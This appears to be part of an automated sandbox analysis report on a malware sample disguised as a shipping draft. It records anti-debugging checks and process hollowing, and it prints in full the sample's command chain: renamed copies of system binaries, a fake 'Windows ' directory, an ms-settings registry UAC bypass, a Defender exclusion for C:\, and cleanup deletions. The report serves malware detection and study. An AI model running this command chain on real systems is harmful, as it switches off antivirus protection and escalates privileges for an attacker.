Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	32_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	34_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW,	36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 36_2_00418981 memset,GetSystemInfo,

36_2_00418981

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp	Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWv-0006.spov-msedge.netLMEM@
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv5415.tmp.36.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Glzskrlg.PIF, 00000027.00000002.1856524613.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Glzskrlg.PIF, 0000002A.00000002.1933047287.0000000000776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bhv5415.tmp.36.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API call chain: ExitProcess graph end node

Source: C:\Users\Public\xkn.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028BD920 CheckRemoteDebuggerPresent,

0_2_028BD920

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugFlags
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process queried: DebugFlags

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_401060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_401060E2

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\ger.exe

16_2_00007FF7E0A3A29C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

36_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40104AB4 mov eax, dword ptr fs:[00000030h]		0_2_40104AB4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279832B5 mov eax, dword ptr fs:[00000030h]		0_2_279832B5

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_4010724E GetProcessHeap,

0_2_4010724E

Enables debug privileges

Source: C:\Users\Public\xkn.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_401060E2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_40102639
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_40102B1C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_27974FDC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_2797BB22
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974B47 SetUnhandledExceptionFilter,	0_2_27974B47
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_279749F9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279749F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_279749F8
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	1_2_004098D0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004098F0 SetUnhandledExceptionFilter,	1_2_004098F0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	5_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	6_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	9_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00007FF70CC88FA4
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF7E0A3ED50
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3F050 SetUnhandledExceptionFilter,	16_2_00007FF7E0A3F050
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF98CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FF6FEF98CCC
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF989F0 SetUnhandledExceptionFilter,	17_2_00007FF6FEF989F0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	31_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	32_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	34_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00007FF70CC88FA4

Source: C:\Users\Public\xkn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 1E0C0000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

0_2_279580EF

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Section unmapped: C:\Users\Public\Libraries\glrkszlG.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Memory written: C:\Users\Public\Libraries\glrkszlG.pif base: 31C008

Jump to behavior

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_27959627 mouse_event,

0_2_27959627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S	Jump to behavior
